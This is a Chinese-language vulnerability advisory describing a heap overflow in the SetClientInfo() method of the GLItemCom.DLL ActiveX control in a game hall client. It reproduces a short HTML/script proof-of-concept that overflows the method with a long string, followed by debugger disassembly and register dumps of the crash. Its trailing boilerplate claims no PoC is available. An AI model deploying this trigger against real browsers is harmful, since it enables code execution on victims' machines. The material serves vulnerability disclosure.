联众世界游戏大厅GLItemCom.DLL ActiveX控件堆溢出漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

BUGTRAQ ID: 25565 联众世界游戏大厅是联众世界自主开发的一款集棋牌、休闲、对战于一体的游戏客户端。 联众世界游戏大厅所安装的GLItemCom.DLL ActiveX控件中SetClientInfo()函数存在堆溢出漏洞。 如果用户受骗使用IE访问了恶意网页的话,就可以触发这个溢出,导致在用户系统上执行任意指令。以下是已公开的PoC代码: -----[Cut Below]------------------------------------------------------------------ <OBJECT id=target classid=clsid:7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574></OBJECT> <SCRIPT> s=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" target.SetClientInfo(1, s, 1) </SCRIPT> -----[Cut Above]------------------------------------------------------------------- 运行PoC后,用ollydbg捕获异常为读取[41414145]无效地址访问异常,有漏洞的代码如下: 033D9315 |> \\8B86 DC000000 MOV EAX,DWORD PTR DS:[ESI+DC] 033D931B |. 85C0 TEST EAX,EAX 033D931D |. 74 34 JE SHORT 033D9353 033D931F |. FF70 04 PUSH DWORD PTR DS:[EAX+4] ; /hWnd <=== 异常处 033D9322 |. FF15 F8523F03 CALL DWORD PTR DS:[<&USER32.IsWindow>] ; \\IsWindow 此时的寄存器情况: EAX 41414141 ECX 03442070 EDX 006900CD ASCII \"ox\" EBX 03442070 ESP 02B9FB2C EBP...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息